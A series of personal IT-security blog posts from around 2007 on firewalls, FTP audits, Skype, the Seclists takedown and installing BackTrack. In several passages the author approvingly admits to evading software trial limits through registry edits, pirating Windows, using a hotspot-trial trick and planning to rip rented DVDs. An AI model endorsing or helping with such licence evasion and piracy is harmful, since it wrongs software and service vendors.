I honestly think email disclaimers are stupid. This is an entertaining list of some bad and worse email disclaimers. Honestly, we all know better than this anyway, and props to any company that just dispenses with this nonsense. I already know that Boeing (a large company that must be security-conscious) does not enforce email disclaimers. If they don't, no one really needs to. Such wasted space and so unnecessary.

This is the best laugh I've had in weeks: CNNs 101 dumbest moments in business in 2006. The Chevy Tahoe viral act gaffe sets the stage, especially once I went to www.youtube.com and looked up some of those Chevy Tahoe ads. It just gets better as well! I didn't realize so many funny and awesome things happened in 2006! And yes, there are IT and security-related incidents listed.

"Someone unfamiliar with the mountains and forests, gorges and defiles, the shape of marshes and wetlands cannot advance the army. One who does not employ local guides cannot gain advantages of terrain. -The Art of War, Chapter 7: Armed Contest

Amen to that.

I read Shark Tales off and on, and saw this one today. While amusing, it also comes with a pang of sadness at how often no one ever know what IT does to keep the ball rolling. IT (all of it, including security) is too often seen as a utility. No one cares until it isn't working. I mean, when was the last time you called up your electricity/internet provider and thanked them for providing the utility that day?

Can't believe I originally missed an article on wardriving! And not a bad one either, considering the ComputerWorld source. The first page is interesting with the setting up of a rather cheap van office. I kinda like that idea, especially considering my car has zero room as it is. I was also enthused about someday getting together some cheap mobile rig (if I got more into wardriving/wireless assessments that is) after watching an episode where the packetsniffers mounted a laptop in their truck. While a front-seat-mounted laptop is borderline illegal (something about a tv or computer screen being visible to the driver), the idea of a mobile wardriving pad is pretty cool. Shag... At any rate, I like a good article with some good technical tips and hardware suggestions. Unlike many ____World articles, it really sounds like this author is definitely speaking from experience. I might have to hunt this guy down when I make it out to Seattle soon.

I'm sure everyone is going to be posting and abuzz about how MySpace got GoDaddy to drop Seclists.org. But what really makes me frustrated and angry is how often people make assumptions and how ignorant so many people can be (and apparently illiterate). Reading the comments here and here is just an exercise in working up a large frustration level with people who think Fyodor was the one who phished those accounts and then posted them on the site for everyone to grab. And so on. That frustration is what prompted this post, not the news item itself.

Big kudos to Fyodor for digging quickly to the heart of the matter in saying MySpace should have taken action to protect its users whose accounts were compromised, not trying to patch up an unpatchable leak.

Personally, despite my knowledge that security sucks still and botnets and phishing are out of control, I am not convinved that ISPs and registrars should be the police of the Internet. There is still a lot of vigilantism out there with non-official sources tracking down and raising cain about phishing sites and botnets and spambots and illegal or copyrighted material, which can end up with a lot of collateral damage as legitimate persons and innocent victims are infringed upon, especially with amatuer cowboys on their missions. I will say, however, that some of that is necessary and legitimate. F-Secure notifying an ISP or registrar about a known phishing site that is doing nothing but phishing is one thing, but non-experts doing it? I'm not sold on that idea.

Shame on MySpace for even pursuing this without at least a little bit of thought or investigation. They could have contact Fyodor themselves, they could have checked into the mailing list, they could have asked around or browsed the archives themselves to see what the whole story was. They could have (and should have!) notified their own users about the accounts and forced a password change. Wiping out a site when the accounts are already leaked and public domain does absolutely nothing to the integrity and security of MySpace and its users.

Shame on GoDaddy for their impatient reactions and also their own lack of follow-thru and investigation. GoDaddy should have experience and relations with known experts and groups who report phishing sites and other TOS violations. I doubt MySpace would or should be amongst those groups. Due process. As a customer of GoDaddy, I would expect due process and not a knee-jerk reaction based on which way the winds are blowing.

"If you hide your form, conceal your tracks, and always remain strictly prepared, then you can be invulnerable yourself." The Art of War, Chapter 4: Formation

There's a lot of analysts and journalists who write and talk a lot, but it's just all blah blah blah blah, with little substance or anything that matters. And they tend to talk in circles and argue a lot about much of nothing. Brian Krebs is not such a writer. He's one of those rare journalist gems in the security world who gets it, and has respect. He tells it like it is, and I gotta admit, I've enjoyed his writing, accuracy, and tenacity in sticking to his guns despite the unwashed ignorant commenting masses on his more popular topics. He wades into the whole substitute teacher porn exposure case quite deeply, and rightly, ready to get the facts out as this whole incident is one out of proportion debacle. Sic balls, chopper!

Another analyst that I have grown to like, mostly because of his style of posting bullet points and getting all his stuff in one post as much as his incites (sic), is Mike Rothman. I may not always agree and I may find his stuff not relevant to my roles, but he has gems. He had one today where he said, "Everyone needs a plan, but those that spend all day planning, spend very little time doing. So plan quick, do stuff, adapt and repeat." We can sit and talk about how to get the perfect security plan and plan, plan, plan so that we're not the next headline in the paper. But we could end up doing that for ten years...and get nowhere. Just do it. Get an idea or something to do and do it. It might be only part of the solution, it might even be wrong, but just do it. Evaluate it. Fix it. Adapt. Improve. But bottomline do something! A company that really wants to support its IT and security personnel will be willing to allow some levity in getting things done and making mistakes here and there. If the company is not, they either won't ever have security, have scared admins who end up doing nothing but the barest bottom line, or they have a team of perfect Jesus Admins working for them.

Laptop encryption is a big deal these days. But one must always keep in mind that the best way to keep sensitive information safe is to not have it on insecure devices and to physically destroy media when no longer used. Encryption, if you want to get really technical, is just obfuscation. It cannot realistically be broken today...but the key word there is "today." If that drive is important enough, an attacker can keep hold of it for years and continuously work against it. Encryption is a huge step up from bare data, but it is still not a complete substitute for sound information storage and usage practices. Either way, full-disk encryption will soon become standard on every hard drive, and users can turn it off if they want on the hardware. Kinda like providing a lock and key on a computer case. If you want to take the trouble to supply the key each time you want in, go for it, otherwise just don't lock it.

A post by Adam Dodge about a couple of University of Arizona departmental web servers being defaced reminded me of a sort of 5-year-ish prediction I have in my head now and then. These webservers were running Twiki and a vulnerability in that program led to the defacement and were apparently known about by the admins.

In my last job we were an ASP (application service provider, i.e. we hosted a web-delivered service) and about 150 employees. About 1/3 of the company was comprised of IT and development staff. The number of applications we, the infrastructure (network, security, sysadmin, etc) team, supported was not terribly high, maybe about 2-3 dozen different types of systems we needed to stay abreast of or at least keep secure. That's still a lot of work to be on top of patching and securing and managing those applications properly. And it really sucked to have surprise applications (one was a wiki hosted on a developer laptop that suddenly became a burden to his system performance [gee, ya think?] and a critical piece of their own processes [ugh, thanks]) pop up in the environment.

My prediction is corporate applications will do one of three things:

1) Security will move to the network and we won't necessarily give a crap about what goes on a system. Thin-client computing is being talked about again... If people want to run an application for their department that is buggy and 7 years old and barely supported anymore, go ahead in your own little secured network area.

2) Security and IT management will win out and corporate applications will consolidate and diminish. Rather than trying out everything under the sun and small pockets of people relying on a disparate number of applications, corporations will get rid of a lot of them and just use the really important ones. Providers that can provide a full solution will benefit. For instance, Salesforce.com provides sales with almost everything they need except corporate email and phones. That's awesome and leaves sales really not wanting for much else other than mobile devices and access to information when they need it, anywhere.

3) We're just plain screwed and the security function of managing all those disparate applications will be a regular task for IT/security.

This flies in the face of what I really think is coming: outsourced security. You can audit, evaluate, test, assess, monitor, and manage alerts from an outsourced entity, but how can an outside entity ever truly understand all those little apps that pop up in every corporate environment? How much clout would such an outsourced team have when saying an HR tool is outdated and should be removed as a liability and administrative drain on resources? How intimate can they REALLY get? (Answer: only as intimate as the tools let them...and they don't get that intimate...)

I guess I can mix this all around and say a prediction will be the grinding of these two gears that don't quite fit with each other: outsourcing security and day-to-day IT tasks vs. the disparate and complex and everchanging digital landscape of the corporate campus.

Sometimes a blog post comment can be just as good as the blog post that inspired it. A comment on a post by Richard Bejtlich is an excellent real-world example of changes that occur in an environment and what can happen if everything is managed separately. I've seen something similar to this before, where a pix static NAT rule was put into place (on accident I hope; we never did answer this question because the tech who made the mistake had left a few months before the discovery) that basically left the balls of 2 servers out on the Internet for the wind to tickle. Eventually they fell victim to worm activity, but thankfully the damage was limited to just those two old dev servers. NSM did not lead me to the answer (we didn't practice that), rather a lucky port scan from the outside conducted from a gut feeling revealed the issue.

I enjoy reading what breaks or didn't work in environments. Too often such stories are so cloaked in corporate secrecy that we don't get the opportunity to learn. How often are firewalls managed in a way that if a system is taken down and another put in its place, the firewall mappings will be reviewed and updated as well? How much chaos in a network can an IT team handle before problems like this arise? How much should policy mandate what happens and what does not happen? Or invoked policies or, better yet, inventory of systems and configs.

At the risk of painting a hat on my head, I have to make a small rant about paying for software.

I have had two fairly "small" tasks at my job in the last 8 months (no, not the only tasks, these are just two I'm pulling out). The first was to audit and "fix" file server permissions on a Windows file server utilizing AD accounts. The second was to be able to enumerate which Exchange mailboxes a user has rights to. Our company allows two levels of managers above an employee to have full access to the employee's mailbox. To anyone who has done either task, what sounds simple is really not all that simple at all.

For the first one, sure you can dump a huge ACL list. But can you answer the question, "What does Joe Blow have access to?" Unless you have a strict policy on user rights management using AD groups, this is much harder to answer. I really enjoy using ScriptLogic's Enterprise Security Reporter. While I don't use this tool nearly to its full value, I do really enjoy the ability to audit a file server and dump reports on permission levels. Would I pay for this tool? I don't know, but until I can, I just creatively use regmon and registry editing to avoid the trial expirations.

For my Exchange rights issue, I found Vyapin's Active Report Kit for Exchange Server. This tool will let me pull out information from AD/Exchange and lets me answer my quesion, even with the export/print-limited trial. My main question was similar to the file server one: "Whose mailboxes does John Foo have access to?" (On a side note, the supposedly limited exporting seemed to send the tool into an endless loop and built up a 2.0GB excel file before I finally decided enough.)

In the end, I really hate paying for tools to do things I really should learn how to do myself, manually, someday. Windows scripting has long been on my list of things to learn, but quite often is nearer the bottom of the list than the top. Someday I will get this down, and then I can answer my own questions and needs rather than looking for expensive software to do them for me. There really are not enough hours in my day...

I need to continue my post below before some evangelists in the security world judge me blindly. :)

I love Windows. Really, I do. Well, ok...I did love Windows. I loved Windows until they started doing that Genuine Advantage Crap. Suddenly half my test machines could no longer be reinstalled and wouldn't get some updates. Microsoft is the biggest single reason I moved to Linux last year. Go figure.

Now, one of the reasons I use and have used Windows so much would be twofold: 1) It comes with new computers and has come with all computers I've bought (i.e. no perceived cost since I couldn't easily avoid it). 2) I could pirate it and use it on my old and spare machines without necessarily paying for it. I would never condone this in a workplace, however, just for home personal use.

Lots of expensive software is out on the market with limited trials and big price tags that talk about things in terms of installation instances or numbers of managed devices. I hate that. I hate having the limitations (subconsious and real) of really cool software. And if I can't use it at home and become intimately familiar and happy with it, why would I ever request my company spend money on it? Something would have to be drop-dead and immediately awesome to get that sort of request pushed through.

I wish more cool software was free to home users so that us geeks can become familiar with them and get them legitimately into the workplace.

Likewise, I have no clue how companies that sell an appliance to do certain things can really expect to get good market penetration without a lot of hard in-your-face sales work, and being able to get IT shops with time to spare to check out the appliance features. I'd much rather be able to get an appliance, even a stripped-down barebones POS running the software at home so that I can get really happy with it. A one-month trial is just lame for most of us already busy geeks, especially when such devices keep wanting to do everything and it takes 3 years just to realize how crappy it was underneath the surface.

Give me free junk to play with that works well, and I'll speak highly of it to people I know, or my own company.

Ok, enough ranting on this topic. I had to get it out sometime!

This isn't on my horizon yet, but someday I will do a BIND DNS server at home, if not sooner at work. Yanked from ISC, NIST has a standards doc (pdf) and there is also a secured BIND configuration and information available as well.

Along with Windows scripting, I do want to sooner get back into programming. Right now, I just kinda need a reason to put programming into practice. I can hack around with Perl and other languages just fine, and have had experience in others like VB and C. But someday when I get really down into learning one of them again, I'll likely go the route of Python. Nicely enough, cdman just today posted about a couple freebie Python books to help out. Dive Into Python and Learning With Python.

Will I get into this this year? Honestly, I'd like to, but I'm not sure if I will have the time until late this year. I do have other plans, and I really hate overbooking my goals in a year. Thankfully, Perl has been around a long time and I suspect Python will also be as useful for that long or longer.

ISC posted good info about the Daylight Savings change, which I won't regurgitate, but I will repost some links. While I never joined in with the fear of the Y2K switch, I really think this DST change will be more problematic than anticipated (anticipation is so high no one is talking about it!).

Aha! I still run Windows 2000 Pro instances so I have to follow special steps (also KB914387 and KB928388). Why do I run 2000? Good question. First, the specs on some systems, mostly older laptops and 500Mhz machines are not good enough to run XP without lots of cursing. Second, I don't have things like XP's Genuine Advantage sqwuacking at me and then disabling my install after 30 days. Screw that.

One thing I have learned in my short time in IT is email boxes are not really a valid storage area, especially for those of us in the infrastructure side of IT. Since I switched jobs last year, I was able to start out with a fresh email box at the new company. I was able to put into action what I had learned late in my last job about not bothering with keeping a huge email store. One of my favorite managers at my last job had almost a zero-sized mail store because of this approach, and I agree with it. There's little reason in saving everything, especially from a business standpoint in my role. Emails:

1) Get read and deleted.
2) Get read and acted upon.
3) Get read and saved out of band, for instance on a backed up file server folder structure. (e.g. licensing codes, personally important stuff...)
4) Get read and then printed out and deleted. They then go into my "desk queue" which goes through the same process as I don't let things linger on my desk either. (Of note, with dual-monitors, I print out less...think about that in your next ~~debate~~ discussion on dual-monitor adoption...)

I do keep a certain amount of monitoring email alerts from my company's monitoring systems just so I can do quick trend analysis by eyeballing the alerts. Those usually are small and I purge huge chunks of them every so often so that I only have a few months' worth.

Sometimes emails build up waiting to be read, but I work hard on keeping the level managable and regularly purged if need be. The only real emails I keep around are sometimes informational or pending projects that can be done down the road. It sucks to get behind with keeping the mailbox cleaned up, and 99% of those emails that slowly build up are really not needed to be kept. Besides, I'm cognizant of storage needs in an organization, and much like reducing my waste and power usage at home to do my part to save the environment, so too do I attempt my part in saving storage space.

Does this work for people in all business roles? Nope. Does this work for me at home? Sadly, no. I tend to be the opposite and not delete much of anything other than the complete crap I get. Thankfully, I don't really get all that much email anyway. I even have a zip of emails from 1996-2002 that I started getting when I started college. If nothing else, they are not many, they make for great memory-goads, and can help me get in touch with old buddies sometimes.

An interesting (and woefully short) question and answer from ComputerWorld, "How many firewalls do I need?"

Answer: "How many can you manage?"

Ok, so that's very simplified and not necessarily the right answer. The thing is, firewalls should be in place on the network any time the trust or sensitivity level of the data or systems changes. If your sales workstations don't need to be up very long and have little sensitive data, but your database server has very sensitive data and needs to be up as much as possible, you really could put a firewall in between the two. If some systems need to be accessed from the Internet but others do not, use a firewall to keep them separate (thus creating your typical DMZ. That way, much like real physical firewalls in cars or buildings, if a "fire" breaks out with an attack against your Internet-accessible servers, the next firewall will contain the "fire" from spreading to those systems that had no business being in the same group as those Internet-accessible ones.

Firewalls are awesome. They create natural choke-points to monitor and measure traffic flow. They allow barriers to access so that you don't have everyone's traffic scurrying around everywhere. They give natural points where traffic capturing and logging can occur (and I've become a big proponent of NSM and logging and traffic analysis).

And put up as many firewalls as you can manage. You can have too many, but the chances of that are far less than not having enough firewalls. Put up as many as you can and remove ones you deem unnecessary or restrictive to network stability later on. But never put up more than you can properly manage. A mismanaged or unmanaged firewall is maybe worse than no firewall at all.

I really believe that firewalls are one of the very few mandatory but not technical necessary pieces of any network (i.e. you CAN run a network without them, but just don't). I consider them a mandatory piece of any network or host-based "defense in depth" approach and one of the most important and valuable (i.e. the value they add) and basic blocks of a network.

My own personal projects list involves learning more firewalls including getting my own home pix someday, becoming more intimately familiar with iptables and pf (if I get into BSD this year), and other standalones like Smoothwall/IPCop and so on.

I hate hearing things like Anti-Virus is dead or IDS is dead. If they're still being used in corporate and home environments, they are not dead! Now, this paper on greylisting (really, on Bit9 parity), is a noble effort, but as a paper about a "new" method to manage software and malware installation and blocking, the title is sensationalist and unnecessary. In fact, over half the paper is spent trying to convince me that anti-virus is dead. Unfortunately, while you might be able to float me a new product or paradigm, you can't convince me anti-virus is dead (even as I don't typically use any at home because I consider myself slightly educated in technical areas).

Anti-virus is not dead. It might be declining and changing, but it is far from dead. The day my parents remove anti-virus is the week they stumble upon malware on a website or in email, run it, and become infected with something. Thank you, move along, come again.

So I skipped down to greylisting. This is not a hugely novel new approach. In fact, the approach stinks when you turn your head in certain directions and sniff around a bit.

From a corporate or even home family perspective, I like the administrative control and tracking on blacklisting and whitelisting. I also like being able to turn it on and off for laptops that might be offsite. This is defeatable, though, and I'm not sold on it fully. I think many corporations will slowly be moving to thin clients or all laptops (while plenty will of course stay with desktops). Laptops leads to...

...From a user perspective, this is still flawed technology. Just like fake SSLs and firewall block/allow alerts, popups to users will not be understood and will eventually just always be allowed. Game over. The false assertion made in the paper is that the user will try to open a Word doc, see something else wants to start, and realize their error and know better than to continue. No, that's not true. There's even a good chance that I, a security-paranoid freak, would just chalk it up to a bad macro or mis-matched version warnings and click Yes before my brain kicks in and says, "No! You idiot!" The following assertion is also odd in that even if the user clicks it, they only infect themselves and not something else. I don't buy that necessarily, or that that was even an option. If they got hosed and something spewed out copies of itself in emails to their contact list, we can just repeat the user acceptance and nothing has changed.

Ok, end rant, time to go home!

Wired.com occassionally has stories of such depth and quality that I am amazed I don't regularly read the mag (I did back in the day about 6 years ago, but drifted away). This is one of those stories about the dark underbelly of illegal credit card and identity dealing and investigations into them. Definitely a must read. Part 1 Part 2 Part 2.5 and Part 3 (I don't understand the sequencing, honestly...)

I saw this and had to try it, especially since I do enjoy Starbucks, Borders, and I tend to be places where I can see T-Mobile hotspots taunting me. Now, for 3 months, I have a trial account that I can use because T-Mobile thinks I run Vista (nope, I don't). This little hack comes from i-hacked.com.

I found a Skype article from CNET posted over at InfoSecPlace and nCircle, and as usual with Skype, I have strong opinions about it. It seems Skype is looking to "partner" with some security companies to provide some additional functionality like "provide add-ons to its software to scan text sent through Skype's chat feature for malicious links."

Ugh. Let's build the frustration just a bit more and quote the article again, "Skype has caused headaches for many IT administrators because it can find ways to make a Net connection despite strong firewall controls on corporate networks."

Ugh, again. First of all, let's get this popular media misconception out of the way. Skype is not my biggest concern because it can find new ways to make a connection to the Internet. Please. If Skype is not a welcome product in a company, this can be circumvented with policy, software/OS restrictions, and even on the network by blocking the sites that Skype initially contacts for logon. Unless they changed in the last year, you couldn't necessarily block authenticated users, but you could easily block the logon process and prevent people from using the system. Not only that, but this is not a "new" headache for admins. Malware has been doing this for a long time...

Second, Skype's problem in the corporate space is not that suspicious links can be sent over the service. Skype's problem is meeting regulations that require Instant Messaging to be logged and/or loggable. And Skype falls into the grey area between phone usage and digital IMing: digital phone calls. I think there is still debate on whether Skype calls need to be monitored as well. Skype needs to deal with that issue before it should spend any more money trying to enter more than just the SOHO corporate space.

Third, Skype has the annoying habit of making outbound connections...everywhere. Anyone who sometimes (or regularly) looks at outbound connections on firewalls for anything suspicious will know that almost every Skype connection seems suspicious. Skype raises the false positive rate so much that it pretty much kills that sort of monitoring. This doesn't kill Skype, but it certain is a factor in saying no to it in a corporate network.

Fourth, Skype needs to look into making a standalone product. They might be able to have a closed IM solution for a corporation that is not open to the public, and still provide decoding capabilities only to that company. Another widespread corporate requirement is the IM network not being publicly accessible. Again, this won't kill Skype, but is another black mark.

Fifth, Andrew at nCircle mentions, rightly, that it also should be centrally managed and configured. Again, if Skype wants to break into anything beyond SOHO markets, they need to provide mangement for the staff. This is important enough to be a possible deal-breaker as well.

Skype is awesome at home and for SOHO use. It saves money, is easy to use, provides good security for the mobile crowd (for now, until the encryption is broken or other MITM attacks might arise), and tends to make employees happy; and one of the things I will thump loudly about: happy users means productive users. I hate having to sport an anti-Skype opinion in the corporate space, but the program itself forces me to be able to take either side, passionately, depending on the corporate environment (i.e. HR, senior management, and regulations).

IT Audit has an article on 11 steps to an effective FTP audit. I like this article and gives some good steps to auditing FTP activity, however I think it misses a few things. While many people are likely already wondering why FTP should be so large-looking a project for such an old and probably under-utilized technology, it is still important, especially if this is a publicly open route into your network. Here are some steps I would add.

A. Audit user accounts and activity - Find out where user accounts are tracked and how expired accounts are handled. Do they linger for years and years without activity? Are client accounts even for active clients anymore? Once this audit is done, keep that list handy so that FTP admins can refer to it later and build upon it so that accounts are removed as needed and existing accounts are tracked. If an account has no activity in 4 years, raise questions on its continued need. I really like the rest of the author's monitoring suggestions. Even if there is seemingly no value in knowing who consistently is the largest transferrer of files, it becomes more important when that consistency is broken one month and some other otherwise quiet account suddenly becomes very active. As part of the account audit, be sure to verify that FTP account access is limited only to their slice of the FTP server, and not overlapping other accounts or able to access other shared spaces. Twenty vendor accounts for 20 vendors that all dump into the same folder is a big risk. Try to also identify shared accounts or those accounts used by just one person, and identify the impact of regularly changing the passwords. Keep in mind that even legitimate users might use the FTP location for malicious reasons such as storing movies or games or other copyrighted property.

B. Recommend granular firewall policies for FTP account access - Whenever possible, require clients, vendors, and FTP users to provide their external IP or IP block to be included in access to the FTP server. It is better to only allow 1,000 IPs access to the FTP server through the firewall than to have all IPs allowed through. It has been my experience that most companies are amiable to providing this information when pressed.

C. Evaluate the patching and security state of the FTP server - Determine the FTP server in use and the version, then research any known vulnerabilities in the server. Recommend patching policy, someone to track patch availability ongoing, and perhaps recommend more secure FTP server solutions. Utilizing an old, insecure version of something like WarFTP or IIS5 should not be very acceptable.

D. Recommend including firewall logs of port 21 access in the audit - It could be beneficial for finding rogue or new FTP servers to include checking firewall logs for successful incoming port 21 occurrences outside the scope of known FTP servers.

FTP servers are still a necessary evil in many corporate environments, and far too many admins put them up, add new users per corporate requests, but otherwise don't consider them with much more interest. As one of likely only a few inroads into your network, FTP servers should be taken as seriously as web and mail servers. The last thing you want to do is find out someone has been using one of your client's accounts to store gigabytes of child pornography over the last 2 years...and be told about it by the client. And even if more secured file transfer options are utilized, such as SFTP or even SSH, most of these guidelines still apply.

If you're not watching the toolswatch feed from Security-Database, you're missing out on one of the better notification methods for new security tools. I love it!

The folks at nCircle have expanded their blog to more people and this has resulted in lots more posts lately. Good stuff!

It is with much sadness that I am removing a few cherished links from the side. The PacketSniffers were an awesome video cast team from Ohio that posted a series of excellent (albeit more electronics-heavy) video casts back in 2005. Sadly, they have not had any in some time. Seems they have maybe moved on from that endeavor. Also, shortly before LUHRQ was purchased, they started this excellent vidcast called "The Hookup." This was very promising, but never progressed past 4 episodes. I think there is still room in the security sphere for a short show like that, kinda like hak5 and others, only shorter and more focused.

Unfortunately, a work-related demand to cease blogging about technology has caused Securosis to become more personal and less technical. It's a shame, too, since the blog was excellent. For some reason, the latest post doesn't look reflected on the front page...so maybe it is still sorta there. Either way, if it is, I'll re-add it later. Tenable Security's blog, while really cool and interesting, is mostly useless to anyone that does not use their commercial product. If I used that product, this blog is a must-read whenever it is updated. Otherwise, I can just learn by reading and possibly gain insight into Nessus, but the useless content (to me) outweighs the good. I'm also removing Jesper Johansson mostly because, well, I don't read it. And lastly, while I read the updates and the podcast is ok, I really don't care to read Alan Shimel's blog daily anymore. This has been building, but mostly just because I'm not an analyst, I'm in the trenches. And reading what an analyst says really doesn't do me any good at all. Besides, I can follow along on other blogs and get the same effect, or pointed to his occassional excellent posts from elsewhere. I'll still listen to the podcast now and then, though.

I really should have put this in my 2007 predictions, but I guess it might be a prediction that spans a few more years. But this year is going to mark a tough year for IT managers due to the ongoing cost of IT operations. Often, upper management thinks that a project will be planned, budgeted, completed, and then they all move on. Sadly, most IT projects require ongoing maintenance, monthly costs, and people to maintain them. Too many senior managers don't get that, and it is those same senior managers who won't ever "get" security either: you don't achieve it, clap yourself on the back, and stamp it Project Closed.

IT costs a shitload of money over the years, and management is starting to or will start to feel that slow attrition. Security costs a ton and is only going to get bigger as regulations keep edging forward. Windows Vista is out now which is going to put pressure on companies that pay licensing fees to upgrade and hardware upgrades to prepare for it. Not only that, but companies with licensing contracts with Microsoft will start to wonder why they spend that money in the first place. Is Vista worth the last 5 years' of software assurance? What about SQL licensing? If a company had that assurance contract the last 3 years, you have absolutely nothing to show for it. You want a disaster site and other business continuity plans? You'll be shelling out monthly fees for that. Mobility is needed by the workforce? Good luck not spending money to secure those devices or provide for mobile needs. Also, mobile devices tend to cost more to get the same performance as a desktop machine, and their lifecycle is shorter.

IT is a huge impact on business these days. Not only can I not imagine business without IT (say, 20 years ago), but I can't imagine how we spend so much money on it today. It is no wonder MSSPs and other outsourced IT services providers are feeling the love as businesses get sick of the constant IT drain and start to let others handle it (for better or worse).

This is why I still prefer to focus on the basics in my career. Focus on doing what needs done on the lowest levels. Use the open source and free tools, know how to do things without the fancy and expensive appliances and servers. If you know the basics and low level foo, you'll be able to pick up on the luxury appliances and tools you're allowed to spend money on, just fine when you get them.

Backtrack 2 is maybe my favorite livecd, largely due to being security/pen-testing oriented. I have an older laptop which doesn't do so well with 128MB RAM when running a livecd. So, I've permanently installed BackTrack on this laptop (which I'm using for this update right now). Here's my steps (very abbreviated) on doing this. I largely followed this tutorial with minor adjustments.

I had to transplant the HD into another laptop that had enough RAM to properly load the livecd. After that, I booted up into BackTrack and logged in as root. Then:

fdisk /dev/hda1
d (since this is an existing drive, have to delete the first partition first)
1
n (now I want to make new partitions)
p (partition)
1
[enter]
+100M (100M boot partition)
n
p
2
[enter]
+512M (512MB swap)
n
p
3
[enter]
[enter] (will use the rest of the disk for this partition)
a
1
t
2
82 (the code for a Linux Swap)
p (one last print to make sure it all looks good, we can still back out to this point)
w (write!)

Then I went graphical with startx and followed the rest of the steps in the doc. After transplanting the drive back into my older laptop here, I was able to boot into BackTrack quite nicely (and fast compared to cd, even on this old hardware!). From here, I needed to get my wireless going. I started up K->Internet->KWifiManager which then got my Orinoco card going. I then opened a terminalL

iwconfig eth0 essid home key 7027...F9F5 (my wireless network and WEP key)
dhcpcd eth0
ifconfig (to verify I have a proper IP)
ping www.google.com

I tend to cloak myself in layers of anonymity in my professional online life. Mailing lists are not an exception. In fact, I try my best to participant on mailing lists in a way that does not disclose the company I work for, for various reasons (whether I stick to my other name or move back to LonerVamp, I'm still debating). I see other people do the same, and sometimes they use some wacky (and creative) psuedonyms that harken back to hacker days of old when handles were used more often than real names. They also typically come from email account at Gmail, Hotmail, or Yahoo.

To anyone who uses such accounts, be aware that how you use them may determine just how anonymous you remain. Using the webmail interface for each account is pretty secure when it comes to what the mailing list can see. However, if you do your email on a mail client and then POP3/SMTP up to the service, you may be revealing your home IP address in the mail headers. I am not sure if Gmail reveals this information, but I do know Hotmail reveals this. I encourage people to test such functionality well in advance of blindly trusting your security and anonymity.

Or, if the mailing list supports it, submit your replies via a web form. I know SecurityFocus has web-based submissions to its mailing lists if you so prefer. I actually prefer that method.

I'm just posting quick about a pet project of mine that is still just in the planning stages and likely won't be done until later this year at the earliest. I'd like to develop and complete a more robust home entertainment system than I currently have.

I watch movies. I listen to music (cd and mp3). But I do not watch TV, and thus also do not record shows. In fact, despite owning a plasma TV, I have not watched a television show or had it even set up with television in about 10 months. I do game, although I own none of the latest generation of consoles. I'm looking to buy into that hobby again soon. I don't typically download movies or rip them from existing media, but I am looking into doing that. There are many movies I'd love to have on hand, but wouldn't really ever pay for. Netflix is as far as I would go there, and I wouldn't mind ripping Netflix movies to digital media, or even copying them with a DVD burner (although I have little experience in that).

FurryGoat pointed me to the InFrant ReadyNAS device which I think is awesome. An alternative might be using FreeNAS, which could be a good project itself. This could act as a media repository, which is something I would certainly need.

I plan to purchase an X-Box 360, at a minimum, so I would stick to that for my DVD/media playing needs. I think I might need to get a Vista box for my Media Center, but I'm not terribly keen on that idea. I don't really have a powerful enough system right now to run Vista well, although I do have some basic parts for a good base (motherboard and CPU that are good workhorses, but bad for gaming).

Any ideas, feel free to post, but otherwise this is just a planning post for me. I think I would be best served looking into getting into DVD ripping and burning, grab a console machine, and also get a storage NAS set up.

A recent post by Ed at SecurityCurve.com pointed me over to the PCI and Data Security Compliance blog. Now, I can't speak intelligently about PCI these days, and a real auditor would run circles around me about compliance. I also don't have to deal directly with this yet in my job, but someday I will, no doubt. And while I don't have a ton of learning bandwidth right now to learn compliance, I at least can regularly peruse this blog and get used to the terminology and what is all kinda going on. So by the time I do get thrown into the PCI maelstrom, I can at least orient myself quickly. Kinda like webappsec blogs. I don't do any web app coding for my job right now, but I certanly want to be familiar with the topic.

I need to watch the episode that Scott Wright references for this post. Instant Messaging is a technology that is still in flux when it comes to corporate use, and I'm always curious on the views people have of it, and how companies use it.

My last company had very little interest in controlling the IT environment. As such, people used Yahoo, AIM, and MSN as they wished. Sales used it regularly, especially those people outside the offices at home or on the road. It really was very useful, even if I wasn't so happy about it. Eventually the company moved to get a centralized (kinda compliant) IM system. We set up a Jabber server, privatized registrations, and got most everyone on that product. Sadly, too often critical business issues were communicated via IM rather than accepted and more loggable avenues of communication such as a ticketing system, phone, or in person searching for someone to assist. Eventually our team went "invisible" on the system because of the abuse and poor "handing-off" of issues via unresponded-to IM messages (and people got pissed that we would always kindly ask for a trouble ticket so that the issue would properly get logged for metrics and reporting). Also, there was widespread fear that we were logging conversations, which drove people away from Jabber. (I never did understand what people were talking about that they were scared it might be logged...besides which we never did turn on logging since no one asked us to do so.) Unfortunately, no one ever supported removing the other IM programs, so eventually Jabber fell by the wayside and only our networking team used it extensively, albeit with a lot of invisibility (hell, our team was geographically split anyway). The user-base then "found" Skype and started installing and using it, despite network team objections. Management had little interest in curbing that, despite the compliancy holes. This is an example of the users pushing technology and process due to indifferent management.

My current company has banned IM use. Not only are many systems limited in user rights and installed software, but my IPS and possibly the web proxy will actively block known IM traffic. Needless to say, we don't use IM, but there is talk about evaluating its use, especially as we do a lot of travel business which regularly sees employees in some exotic locations.

What is the proper answer? I don't think there is a universal answer and it will depend on the company, the business needs, and compliance issues. I do think, however, that IM will eventually continue its push into business. Email is broken as a technology and will very, very slowly be replaced with more IM/SMS technologies. I also think that IM is such an integral tool in our culture and lives that business really cannot just completely preclude it forever. I'd rather properly implement it now rather than later, do it properly, and reap the business benefits. Many people will argue about lost productivity, but I don't think that will necessarily be the case, especially in a private IM system. Besides, if someone is going to screw around, they will screw around whether it is via IM or not.

An article in InformationWeek has sparked some comments through the various security bloggers. I've decided to play devil's advocate for a moment when it comes to user training. Basically, I'm just making a point or two, so don't lambaste me too hard for being wrong or pessimistic. :)

the vcr clock dilemma
How many people do you know have a VCR/DVD player/Oven/Microwave clock that continuously blinks or is set to the wrong time? Ever wonder why? Typically, people don't really care to be bothered with setting it after a power outage. Some people may have faulty power and have interruptions regularly, but most people just don't care enough or maybe even find it cumbersome to change the time.

Similarly in security, not everyone wants to care about the technical ins and outs of security. They don't want to be bothered in their life with technical details. It just might not be their thing, or, if they are adults, they just don't have the time to become an expert. It is easy for us geeks to live this sort of lifestyle and to wonder loudly why people don't educate themselves about their computer, just like it is easy for them to wonder loudly why we don't get out more. :) Some people tune their own cars and motorcycles, others take it to a shop to get fixed, and still others just let it all go to hell. Are those people idiots for doing that? Maybe the latter, but what if maintaining the car costs more than just letting it go and getting another junker? Basically speaking, we can't make people care about their computers and put in enough time to become experts in a way that mitigates their risk. We all have friends who fall into this category, I'm sure.

the trampoline illustration
